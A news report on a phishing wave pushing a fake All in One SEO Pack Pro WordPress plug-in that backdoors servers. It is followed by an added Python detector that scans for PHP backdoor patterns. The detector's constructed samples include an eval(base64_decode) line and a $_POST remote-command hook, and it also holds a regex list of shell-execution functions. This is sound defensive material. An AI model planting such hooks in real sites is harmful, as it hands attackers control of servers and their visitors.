Germany’s Heise Online reports that security firm Sucuri is warning of a wave of phishing emails intended to trick WordPress administrators into installing a plug-in that serves up malware to site visitors. The email ostensibly offers site administrators the Pro version of the popular All in One SEO Pack plug-in free of charge.
However, anyone clicking on the email’s download link isn’t taken to the official WordPress plug-in page, but to a spammer-infested domain in Australia (.com.au) or Brazil (.com.br). That alone should give administrators pause. According to Sucuri, some of their customers have nevertheless actually installed the malicious plug-in. Once installed, the plug-in opens a backdoor on the server, giving the attackers full access, and replaces the infected blog’s index.php file.
From that point on, the criminals behind the fake plug-in can insert any code they like into their victim’s website and attempt to attack visitors’ computers. Several versions of the malicious plug-in redirect visitors to pornography sites or to other servers that also attempt to install malware on visitors’ computers.
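The two checks an administrator would want after reading this are simple to automate: before installing, confirm that a download link actually points at wordpress.org rather than a look-alike host; after the fact, compare the site's index.php against a known-good hash and scan the plug-in directory for the obfuscation and execution patterns that PHP backdoors rely on. The following is an added example written for this page, not Sucuri's scanner or any code from the report. The indicator list, the file contents and the paths are constructed for illustration; in real use, the known-good hash comes from your own pristine copy of index.php.

```python
"""Constructed detection checks for a backdoored WordPress plug-in.
Added example, not from Sucuri or Heise; all sample files are made up."""
import hashlib
import re
from typing import Dict, List
from urllib.parse import urlparse

# Patterns common to PHP backdoors: obfuscated payloads run through eval(),
# shell execution, dynamic code creation, and request parameters used as
# function names. Hits are indicators, not proof; review the file by hand.
BACKDOOR_INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "gzinflate": re.compile(r"\bgzinflate\s*\("),
    "str_rot13": re.compile(r"\bstr_rot13\s*\("),
    "shell_exec": re.compile(r"\b(?:shell_exec|system|passthru|exec|popen)\s*\("),
    "preg_replace_e": re.compile(r"\bpreg_replace\s*\(\s*['\"]/.*?/[a-z]*e[a-z]*['\"]"),
    "create_function": re.compile(r"\bcreate_function\s*\("),
    "request_as_function": re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\("),
}


def download_link_is_official(url: str) -> bool:
    """True only if the host is wordpress.org or a subdomain of it.
    A suffix check alone would accept wordpress.org.example.com.au."""
    host = (urlparse(url).hostname or "").lower()
    return host == "wordpress.org" or host.endswith(".wordpress.org")


def scan_php_source(src: str) -> List[str]:
    """Return the sorted names of every indicator that matches the source."""
    return sorted(name for name, rx in BACKDOOR_INDICATORS.items() if rx.search(src))


def scan_plugin_tree(tree: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan every .php file under wp-content/plugins; map path -> indicators hit."""
    findings: Dict[str, List[str]] = {}
    for path, src in tree.items():
        if path.startswith("wp-content/plugins/") and path.endswith(".php"):
            hits = scan_php_source(src)
            if hits:
                findings[path] = hits
    return findings


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def index_php_replaced(current: str, known_good_sha256: str) -> bool:
    """True if index.php no longer matches the hash of the pristine copy."""
    return sha256_hex(current) != known_good_sha256


# Constructed sample files (hypothetical contents, not real plug-in code).
PRISTINE_INDEX = (
    "<?php\n"
    "define('WP_USE_THEMES', true);\n"
    "require __DIR__ . '/wp-blog-header.php';\n"
)
# The same file after the attackers append an obfuscated redirect.
TAMPERED_INDEX = PRISTINE_INDEX + "eval(base64_decode('ZWNobyAiaGkiOw=='));\n"

FAKE_PLUGIN = (
    "<?php\n"
    "/* Plugin Name: All in One SEO Pack Pro */\n"
    "eval(base64_decode('ZWNobyAiaGkiOw=='));\n"          # hidden payload
    "if (isset($_POST['c'])) { $_POST['c']($_POST['a']); }\n"  # remote command hook
)
LEGIT_PLUGIN = (
    "<?php\n"
    "/* Plugin Name: Hello Dolly */\n"
    "function hello_dolly() { echo 'Hello'; }\n"
    "add_action('admin_notices', 'hello_dolly');\n"
)

SAMPLE_TREE = {
    "index.php": TAMPERED_INDEX,
    "wp-content/plugins/all-in-one-seo-pack-pro/aiosp.php": FAKE_PLUGIN,
    "wp-content/plugins/hello/hello.php": LEGIT_PLUGIN,
}


if __name__ == "__main__":
    print("link official:", download_link_is_official("http://seo-pro.example.com.au/aiosp.zip"))
    print("index.php replaced:", index_php_replaced(SAMPLE_TREE["index.php"], sha256_hex(PRISTINE_INDEX)))
    for path, hits in scan_plugin_tree(SAMPLE_TREE).items():
        print(path, "->", ", ".join(hits))
```

The indicator scan deliberately ignores files outside wp-content/plugins so that it can be run against a plug-in archive before activation; the hash check covers the core file the report says gets replaced. Both produce leads for manual review rather than a verdict, since legitimate plug-ins occasionally use base64_decode for benign reasons.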
Due to its widespread use, WordPress is a favourite target for hackers who attempt to misuse others’ websites for spam distribution or for DDoS attacks. In one recent DDoS attack on a forum, thousands of legitimate WordPress sites were misused as part of the attack wave without their owners’ knowledge.